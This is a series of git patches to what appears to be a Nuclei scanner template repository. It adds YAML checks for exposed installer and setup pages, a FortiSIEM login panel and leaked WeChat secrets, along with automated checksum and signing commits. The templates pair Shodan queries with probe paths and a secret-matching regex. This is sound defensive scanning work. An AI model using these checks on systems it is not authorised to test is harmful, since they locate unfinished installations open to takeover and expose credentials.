2024 16:42:58 +0530 Subject: [PATCH 1441/1768] Create projectsend-installer.yaml --- .../installer/projectsend-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/projectsend-installer.yaml diff --git a/http/misconfiguration/installer/projectsend-installer.yaml b/http/misconfiguration/installer/projectsend-installer.yaml new file mode 100644 index 0000000000..4a0eef8ebb --- /dev/null +++ b/http/misconfiguration/installer/projectsend-installer.yaml @@ -0,0 +1,31 @@ +id: projectsend-installer + +info: + name: ProjectSend Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed ProjectSend installation page. + reference: + - https://www.projectsend.org/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"ProjectSend setup" + tags: misconfig,install,exposure,projectsend + +http: + - method: GET + path: + - "{{BaseURL}}/install/index.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Install » ProjectSend" + + - type: status + status: + - 200 From f77f55b05eefe1a91b67231862428e1c8623c469 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 16:47:07 +0530 Subject: [PATCH 1442/1768] Create ubersmith-installer.yaml --- .../installer/ubersmith-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/ubersmith-installer.yaml diff --git a/http/misconfiguration/installer/ubersmith-installer.yaml b/http/misconfiguration/installer/ubersmith-installer.yaml new file mode 100644 index 0000000000..f8b8218812 --- /dev/null +++ b/http/misconfiguration/installer/ubersmith-installer.yaml @@ -0,0 +1,31 @@ +id: ubersmith-installer + +info: + name: Ubersmith Setup Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed Ubersmith Setup page. + reference: + - https://ubersmith.com/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"Ubersmith Setup" + tags: misconfig,install,exposure,ubersmith + +http: + - method: GET + path: + - "{{BaseURL}}/setup/index.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Ubersmith Setup" + + - type: status + status: + - 200 From 0b1b79ab351bac6a550e7fb6a79a7905fa4b8c62 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 11:26:19 +0000 Subject: [PATCH 1444/1768] Auto Generated Templates Checksum [Tue May 28 11:26:18 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 17950f6572..159e8e8e13 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5424,7 +5424,7 @@ http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287f http/misconfiguration/installer/espocrm-installer.yaml:fccc8f34a7a3101fe1171472726b160881408b3a http/misconfiguration/installer/eyoucms-installer.yaml:a39da2ac7d242b481b6cebd70a0b4b89317a903b http/misconfiguration/installer/facturascripts-installer.yaml:cba5490847e989a892fef13fdcd1ae9f2c01dbea -http/misconfiguration/installer/flarum-installer.yaml:f2e2c800673831cb7a4ea8053f2e45d2a93e39bb +http/misconfiguration/installer/flarum-installer.yaml:b7ee710c481aa3675092568601ea31b522313b39 http/misconfiguration/installer/fleetcart-installer.yaml:dea791b407e94992fd22b6b781bffbdc07358fcb http/misconfiguration/installer/forgejo-installer.yaml:4438f54db2524ab11b7d2f0544d3f75c89feb83a http/misconfiguration/installer/froxlor-installer.yaml:4e750156a862eba74eb7edf2efa7b91fb7b273dc @@ -6981,7 +6981,7 @@ http/technologies/swag-instance-default-page.yaml:d4643f41f726f357460d39fa02b869 http/technologies/switch-protocol.yaml:9e7d35889c050f18a43fdfd29498913b84878b6a http/technologies/synology-web-station.yaml:28d3a14c78cde632ddbed93de03148cffb1b3fb6 http/technologies/tableau-server-detect.yaml:6e0417d43e7d6773330d82b6088270c9004a8daa -http/technologies/tech-detect.yaml:8da8bdae62f4f497e27b797a3571dab0e2c7e579 +http/technologies/tech-detect.yaml:163c42d19380ed74df154d367227f372929d032e http/technologies/telerik/telerik-dialoghandler-detect.yaml:28ede6444f34199767b36a8317d80eb705805366 http/technologies/telerik/telerik-fileupload-detect.yaml:eb5db507fb5a1c3bfba3651c389c4e8b175ca2d1 http/technologies/teradici-pcoip.yaml:710bd965305a025c6f8793f5e3e13fa2117212ad @@ -8576,7 +8576,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:64c35ec6a109228def6cb0555862542b66f1416b +templates-checksum.txt:b52d136fba4351a25542d30e38b49e40e39323d5 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e9e237db4dc05dffc3931186c70f6d1f1e31546f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 11:28:01 +0000 Subject: [PATCH 1445/1768] Auto Template Signing [Tue May 28 11:28:01 UTC 2024] :robot: --- http/technologies/tech-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/tech-detect.yaml b/http/technologies/tech-detect.yaml index 3840e0efa9..376458562a 100644 --- a/http/technologies/tech-detect.yaml +++ b/http/technologies/tech-detect.yaml @@ -3733,4 +3733,4 @@ http: words: - "X-ClickHouse-Summary" case-insensitive: true -# digest: 4b0a00483046022100ba8d6eae9311c902babb5fce09a84ba79bb0317dbf6caca514245e0c60a3b3520221009ce0d2c9c1144d45590bfed8ab4c81f6bde45a053a2b3156d25bdb4aba006253:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206435742292b7b33283b264123be82c44d4f4102132875d35561296cd0c603c9d02202578a061dcb35c3284cadf8c815d7831fce13d645643c27a1fcd779925f0e56c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 10ee5ab954d6484a3aa3a226f2a55db8ae4d81e9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 17:21:18 +0530 Subject: [PATCH 1446/1768] Create snipe-it-installer.yaml --- .../installer/snipe-it-installer.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 http/misconfiguration/installer/snipe-it-installer.yaml diff --git a/http/misconfiguration/installer/snipe-it-installer.yaml b/http/misconfiguration/installer/snipe-it-installer.yaml new file mode 100644 index 0000000000..d3646c227e --- /dev/null +++ b/http/misconfiguration/installer/snipe-it-installer.yaml @@ -0,0 +1,33 @@ +id: snipe-it-installer + +info: + name: Snipe-IT Setup Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed Snipe-IT Setup page. + reference: + - https://snipeitapp.com/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"Snipe-IT Setup" + tags: misconfig,install,exposure,snipe-it + +http: + - method: GET + path: + - "{{BaseURL}}/setup" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Snipe-IT Setup" + - "Create Admin User" + condition: and + + - type: status + status: + - 200 From 7f1cea6892886a791034358700c642f91ddfe13a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 17:25:03 +0530 Subject: [PATCH 1447/1768] Create justfans-installer.yaml --- .../installer/justfans-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/justfans-installer.yaml diff --git a/http/misconfiguration/installer/justfans-installer.yaml b/http/misconfiguration/installer/justfans-installer.yaml new file mode 100644 index 0000000000..14ec8c2232 --- /dev/null +++ b/http/misconfiguration/installer/justfans-installer.yaml @@ -0,0 +1,31 @@ +id: justfans-installer + +info: + name: JustFans Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed JustFans Setup page. + reference: + - https://codecanyon.net/item/justfans-premium-content-creators-saas-platform/35154898 + metadata: + verified: true + max-request: 1 + shodan-query: html:"Install the script - JustFans" + tags: misconfig,install,exposure,justfans + +http: + - method: GET + path: + - "{{BaseURL}}/install" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Install the script - JustFans" + + - type: status + status: + - 200 From 0f3720ac7ea96338a5919ded56a718c741ae1ec2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 17:29:12 +0530 Subject: [PATCH 1448/1768] Create invoice-ninja-installer.yaml --- .../installer/invoice-ninja-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/invoice-ninja-installer.yaml diff --git a/http/misconfiguration/installer/invoice-ninja-installer.yaml b/http/misconfiguration/installer/invoice-ninja-installer.yaml new file mode 100644 index 0000000000..93c12f260b --- /dev/null +++ b/http/misconfiguration/installer/invoice-ninja-installer.yaml @@ -0,0 +1,31 @@ +id: invoice-ninja-installer + +info: + name: Invoice Ninja Setup Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed Invoice Ninja Setup page. + reference: + - https://invoiceninja.com/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"Invoice Ninja Setup" + tags: misconfig,install,exposure,invoice + +http: + - method: GET + path: + - "{{BaseURL}}/setup" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Invoice Ninja Setup" + + - type: status + status: + - 200 From f7204daf8c8f63fef597afee202b937a5a6b8f6d Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 12:38:50 +0000 Subject: [PATCH 1449/1768] Auto Generated New Template Addition List [Tue May 28 12:38:50 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 1568df1e30..96659358aa 100644 --- a/.new-additions +++ b/.new-additions @@ -13,6 +13,7 @@ http/exposed-panels/vrealize-hyperic-login-panel.yaml http/misconfiguration/installer/flarum-installer.yaml http/misconfiguration/installer/fleetcart-installer.yaml http/misconfiguration/installer/openemr-setup-installer.yaml +http/misconfiguration/installer/projectsend-installer.yaml http/technologies/gotweb-detect.yaml http/vulnerabilities/other/array-vpn-lfi.yaml http/vulnerabilities/other/cerio-dt-rce.yaml From 216ae52f0a6d2362f18e496d31ae3a9e3ab102da Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 12:39:13 +0000 Subject: [PATCH 1450/1768] Auto Generated Templates Checksum [Tue May 28 12:39:13 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 159e8e8e13..1aaa7e73b8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5484,6 +5484,7 @@ http/misconfiguration/installer/pmm-installer.yaml:32509e9fe33719aacf310d33d0a40 http/misconfiguration/installer/posteio-installer.yaml:d4662ebf401e1c2128570f674b63ccf25970599b http/misconfiguration/installer/prestashop-installer.yaml:5011384078f8708b8ec90caa52c299ecb922dea5 http/misconfiguration/installer/processwire-installer.yaml:77810f7d222228fb1c1afb38560135f4b7718d24 +http/misconfiguration/installer/projectsend-installer.yaml:a8c83ce196cece320aff9008a73055ed2cfbeae9 http/misconfiguration/installer/qloapps-installer.yaml:4cd9381f76856e1537af119a837b6e303bc97217 http/misconfiguration/installer/redash-installer.yaml:1087870f7e1826761d0ecbfbbc60528e43e028e0 http/misconfiguration/installer/ruckus-smartzone-install.yaml:48c25f2717f5e5a62abc32cc50f61474534259c7 @@ -6981,7 +6982,7 @@ http/technologies/swag-instance-default-page.yaml:d4643f41f726f357460d39fa02b869 http/technologies/switch-protocol.yaml:9e7d35889c050f18a43fdfd29498913b84878b6a http/technologies/synology-web-station.yaml:28d3a14c78cde632ddbed93de03148cffb1b3fb6 http/technologies/tableau-server-detect.yaml:6e0417d43e7d6773330d82b6088270c9004a8daa -http/technologies/tech-detect.yaml:163c42d19380ed74df154d367227f372929d032e +http/technologies/tech-detect.yaml:9a412a58865301201466e8d67a25407470b4a3b3 http/technologies/telerik/telerik-dialoghandler-detect.yaml:28ede6444f34199767b36a8317d80eb705805366 http/technologies/telerik/telerik-fileupload-detect.yaml:eb5db507fb5a1c3bfba3651c389c4e8b175ca2d1 http/technologies/teradici-pcoip.yaml:710bd965305a025c6f8793f5e3e13fa2117212ad @@ -8576,7 +8577,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:b52d136fba4351a25542d30e38b49e40e39323d5 +templates-checksum.txt:c796c13e305b8137a623c7faaa20aa420baf2a6a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From fe8986836c55682f41df38e7a15cc273f98b8755 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 12:39:55 +0000 Subject: [PATCH 1451/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 391b388721..470ed76a77 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -18,6 +18,7 @@ on: - 'http/misconfiguration/installer/flarum-installer.yaml' - 'http/misconfiguration/installer/fleetcart-installer.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' + - 'http/misconfiguration/installer/projectsend-installer.yaml' - 'http/technologies/gotweb-detect.yaml' - 'http/vulnerabilities/other/array-vpn-lfi.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' From f5b830a70c123e34cedd8a597111f307814fbcd3 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 12:40:09 +0000 Subject: [PATCH 1452/1768] Auto Generated New Template Addition List [Tue May 28 12:40:09 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 96659358aa..c25d534938 100644 --- a/.new-additions +++ b/.new-additions @@ -14,6 +14,7 @@ http/misconfiguration/installer/flarum-installer.yaml http/misconfiguration/installer/fleetcart-installer.yaml http/misconfiguration/installer/openemr-setup-installer.yaml http/misconfiguration/installer/projectsend-installer.yaml +http/misconfiguration/installer/stackposts-installer.yaml http/technologies/gotweb-detect.yaml http/vulnerabilities/other/array-vpn-lfi.yaml http/vulnerabilities/other/cerio-dt-rce.yaml From 6bd92cf8347d603c58c59b79643280e2f1b85dbf Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 12:40:20 +0000 Subject: [PATCH 1453/1768] Auto Generated Templates Checksum [Tue May 28 12:40:20 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 1aaa7e73b8..bea2049b5b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5498,6 +5498,7 @@ http/misconfiguration/installer/smf-installer.yaml:8a1dc0aa144a9dcc21e28700824d3 http/misconfiguration/installer/sms-installer.yaml:c9d601c3fcdab053214228580512c01923e6aeb3 http/misconfiguration/installer/spa-cart-installer.yaml:49531886b7f6388b490c27462a4d305bb3b2f093 http/misconfiguration/installer/spip-install.yaml:14a25f5be35d80683649fcac189993c8c514ee23 +http/misconfiguration/installer/stackposts-installer.yaml:2fb3f671a7bcb4be5998f1e9db135239538e8448 http/misconfiguration/installer/sugarcrm-install.yaml:a253a2bb6995ab8232ce780dcfaa5fa60f3a40ca http/misconfiguration/installer/suitecrm-installer.yaml:0c39360372f4dd838d49b82ba353aecb8a6d6b3b http/misconfiguration/installer/sumowebtools-installer.yaml:fd2852a171b68f3b8f5290b80da4c84daa1afbcc @@ -8577,7 +8578,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c796c13e305b8137a623c7faaa20aa420baf2a6a +templates-checksum.txt:ae68b3f460d77d21e9be5d91d1dca2b6dac96d43 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 5c02a6433673f24a41ee57480a883cdc04a92616 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 12:40:39 +0000 Subject: [PATCH 1454/1768] Auto Template Signing [Tue May 28 12:40:39 UTC 2024] :robot: --- http/misconfiguration/installer/projectsend-installer.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/installer/projectsend-installer.yaml b/http/misconfiguration/installer/projectsend-installer.yaml index 4a0eef8ebb..63635f5412 100644 --- a/http/misconfiguration/installer/projectsend-installer.yaml +++ b/http/misconfiguration/installer/projectsend-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502210082f7bdb68807817103398c614e50dd995b73a28d7e5245ea50c8fab55682148e022024f583421998cfd85a5caabde87e48a0ea71e20ff6b13cdbda7f693308975892:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 86c3bcafe7e290897435639329d292b7df84040d Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 12:40:58 +0000 Subject: [PATCH 1455/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 470ed76a77..7d29ae0745 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -19,6 +19,7 @@ on: - 'http/misconfiguration/installer/fleetcart-installer.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' - 'http/misconfiguration/installer/projectsend-installer.yaml' + - 'http/misconfiguration/installer/stackposts-installer.yaml' - 'http/technologies/gotweb-detect.yaml' - 'http/vulnerabilities/other/array-vpn-lfi.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' From b27cedbdd3729dec7ed2618636742acb5a95a89b Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 14:43:29 +0000 Subject: [PATCH 1456/1768] Auto Generated New Template Addition List [Tue May 28 14:43:29 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index c25d534938..99b87b127d 100644 --- a/.new-additions +++ b/.new-additions @@ -10,6 +10,7 @@ http/default-logins/cambium-networks/cambium-networks-default-login.yaml http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml http/exposed-panels/cisco-firepower-panel.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml +http/exposures/tokens/wechat/wechat-secret-key.yaml http/misconfiguration/installer/flarum-installer.yaml http/misconfiguration/installer/fleetcart-installer.yaml http/misconfiguration/installer/openemr-setup-installer.yaml From 2fe073383f3b90de9f9e3ca8dc7468664c1847ec Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 14:43:37 +0000 Subject: [PATCH 1457/1768] Auto Generated Templates Checksum [Tue May 28 14:43:37 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index bea2049b5b..ecd4608e62 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5094,6 +5094,7 @@ http/exposures/tokens/truenas/truenas-api-key.yaml:6d4dc0b155d4712643709cf7ca297 http/exposures/tokens/twilio/twilio-api-key.yaml:47330462cb2543118a5a7364e3640207ec6743a5 http/exposures/tokens/twitter/twitter-client-id.yaml:c92de370ea212c866b8ebafe350c419de4396c78 http/exposures/tokens/twitter/twitter-secret-key.yaml:80a9e988a78092fb9f2d856018f6fdecfc44ea67 +http/exposures/tokens/wechat/wechat-secret-key.yaml:c084c1779c30ee4c681c3694d6bc59a00240340a http/exposures/tokens/wireguard/wireguard-preshared-key.yaml:b1b834fca36f5387b0992472dfc8e65ad7182add http/exposures/tokens/wireguard/wireguard-private-key.yaml:bdbd1193a2679747f217b7f189bc1681bc7ac2d4 http/exposures/tokens/zapier/zapier-webhook-token.yaml:2003b8aeff54e5608d7205ef0ce7d723022efe99 @@ -5484,7 +5485,7 @@ http/misconfiguration/installer/pmm-installer.yaml:32509e9fe33719aacf310d33d0a40 http/misconfiguration/installer/posteio-installer.yaml:d4662ebf401e1c2128570f674b63ccf25970599b http/misconfiguration/installer/prestashop-installer.yaml:5011384078f8708b8ec90caa52c299ecb922dea5 http/misconfiguration/installer/processwire-installer.yaml:77810f7d222228fb1c1afb38560135f4b7718d24 -http/misconfiguration/installer/projectsend-installer.yaml:a8c83ce196cece320aff9008a73055ed2cfbeae9 +http/misconfiguration/installer/projectsend-installer.yaml:aa78d14c8384bd5355f0d504c5d73032eef9cc80 http/misconfiguration/installer/qloapps-installer.yaml:4cd9381f76856e1537af119a837b6e303bc97217 http/misconfiguration/installer/redash-installer.yaml:1087870f7e1826761d0ecbfbbc60528e43e028e0 http/misconfiguration/installer/ruckus-smartzone-install.yaml:48c25f2717f5e5a62abc32cc50f61474534259c7 @@ -8578,7 +8579,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ae68b3f460d77d21e9be5d91d1dca2b6dac96d43 +templates-checksum.txt:21e631f5b2cb4128a1efae8498bae65ffa6c352f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 91dd994c63804a56029cf4e0c8a9f24ad0b765e9 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 14:44:16 +0000 Subject: [PATCH 1458/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 7d29ae0745..35fde475e5 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -15,6 +15,7 @@ on: - 'http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml' - 'http/exposed-panels/cisco-firepower-panel.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' + - 'http/exposures/tokens/wechat/wechat-secret-key.yaml' - 'http/misconfiguration/installer/flarum-installer.yaml' - 'http/misconfiguration/installer/fleetcart-installer.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' From 01128069d37e1f321fe67e878775b31e5c626c59 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 14:45:20 +0000 Subject: [PATCH 1459/1768] Auto Template Signing [Tue May 28 14:45:20 UTC 2024] :robot: --- http/exposures/tokens/wechat/wechat-secret-key.yaml | 3 ++- http/misconfiguration/installer/stackposts-installer.yaml | 1 + 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/http/exposures/tokens/wechat/wechat-secret-key.yaml b/http/exposures/tokens/wechat/wechat-secret-key.yaml index 33ab8f6644..785d9ddaa3 100644 --- a/http/exposures/tokens/wechat/wechat-secret-key.yaml +++ b/http/exposures/tokens/wechat/wechat-secret-key.yaml @@ -20,4 +20,5 @@ http: - type: regex part: body regex: - - (?i)corpsecret\s*[:=]\s*["']?([a-z0-9\-]+)["']? \ No newline at end of file + - (?i)corpsecret\s*[:=]\s*["']?([a-z0-9\-]+)["']? +# digest: 4a0a00473045022100aef8483cbb936450af46573a3a83ca4f68539195274b15135643b579204a56fa02201c49a697c63fc9043f34278dcf93009b455fa061d5d32b424fdd3c4a5d26fa56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/stackposts-installer.yaml b/http/misconfiguration/installer/stackposts-installer.yaml index 08781a7f4a..9994a5aea1 100644 --- a/http/misconfiguration/installer/stackposts-installer.yaml +++ b/http/misconfiguration/installer/stackposts-installer.yaml @@ -30,3 +30,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100d0691e01d5b4670558a676902a7a350be1aaca4d572848212b576ba97bd998f5022063d7019e599581864ddb6b5a1a8b6ceeb2d8727af334d337ea27969a88c05740:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From f93f159e3bfb13be61d9ebfef756ce1e7ec5d9ab Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 28 May 2024 20:20:24 +0530 Subject: [PATCH 1460/1768] Create fortisiem-panel.yaml --- .../fortinet/fortisiem-panel.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/exposed-panels/fortinet/fortisiem-panel.yaml diff --git a/http/exposed-panels/fortinet/fortisiem-panel.yaml b/http/exposed-panels/fortinet/fortisiem-panel.yaml new file mode 100644 index 0000000000..2bbb829426 --- /dev/null +++ b/http/exposed-panels/fortinet/fortisiem-panel.yaml @@ -0,0 +1,34 @@ +id: fortisiem-panel + +info: + name: FortiSIEM Login Panel - Detect + author: pussycat0x + severity: info + description: FortiSIEM login panel was detected. + metadata: + shodan-query: http.favicon.hash:-1341442175 + verified: true + tags: panel,fortisiem + +flow: http(1) && http(2) +http: + - method: GET + path: + - "{{BaseURL}}/phoenix/login.html" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code == 200" + - "(\"426d365a42bbc67c092b9c2e49b336420f0559d1\" == sha1(body))" + condition: and + + - method: GET + path: + - "{{BaseURL}}/phoenix/js/login.min.js" + + matchers: + - type: word + words: + - "fortiSIEM_current_login_salt" From be9c5604cff4602c030f7016cd7f9d4521daa0f8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 21:03:26 +0530 Subject: [PATCH 1461/1768] Create cms-made-simple-installer.yaml --- .../installer/cms-made-simple-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/cms-made-simple-installer.yaml diff --git a/http/misconfiguration/installer/cms-made-simple-installer.yaml b/http/misconfiguration/installer/cms-made-simple-installer.yaml new file mode 100644 index 0000000000..85a805cd0e --- /dev/null +++ b/http/misconfiguration/installer/cms-made-simple-installer.yaml @@ -0,0 +1,31 @@ +id: cms-made-simple-installer + +info: + name: CMS Made Simple Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed CMS Made Simple Installation page. + reference: + - https://www.cmsmadesimple.org/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"CMS Made Simple Install/Upgrade" + tags: misconfig,install,exposure,cms-made-simple + +http: + - method: GET + path: + - "{{BaseURL}}/install/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "CMS Made Simple Install/Upgrade" + + - type: status + status: + - 200 From da3a75075ce6a342d6839b8158033666a792ce43 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 16:35:00 +0000 Subject: [PATCH 1462/1768] Auto Generated New Template Addition List [Tue May 28 16:35:00 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 99b87b127d..63c8295176 100644 --- a/.new-additions +++ b/.new-additions @@ -11,6 +11,7 @@ http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml http/exposed-panels/cisco-firepower-panel.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml http/exposures/tokens/wechat/wechat-secret-key.yaml +http/misconfiguration/installer/cms-made-simple-installer.yaml http/misconfiguration/installer/flarum-installer.yaml http/misconfiguration/installer/fleetcart-installer.yaml http/misconfiguration/installer/openemr-setup-installer.yaml From ac97ab6b8920ee8a7ce6b869c7f8241325ce8d09 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 16:35:05 +0000 Subject: [PATCH 1463/1768] Auto Generated Templates Checksum [Tue May 28 16:35:05 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ecd4608e62..f831f09a99 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5094,7 +5094,7 @@ http/exposures/tokens/truenas/truenas-api-key.yaml:6d4dc0b155d4712643709cf7ca297 http/exposures/tokens/twilio/twilio-api-key.yaml:47330462cb2543118a5a7364e3640207ec6743a5 